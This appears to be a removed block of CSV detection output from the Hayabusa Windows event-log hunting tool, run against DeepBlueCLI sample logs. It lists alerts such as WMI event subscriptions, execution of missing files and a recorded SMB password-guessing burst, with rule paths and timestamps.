-2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 18:53:55.378 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 23:10:46.008 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:45:14.660 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:45:42.333 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:46:17.504 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:46:53.627 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:47:29.168 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:48:26.011 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:48:49.187 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:49:58.603 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:51:06.219 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:51:13.833 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:51:25.086 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:51:39.538 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:52:37.050 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:53:24.700 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:53:57.790 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 01:34:31.100 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- -2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.343 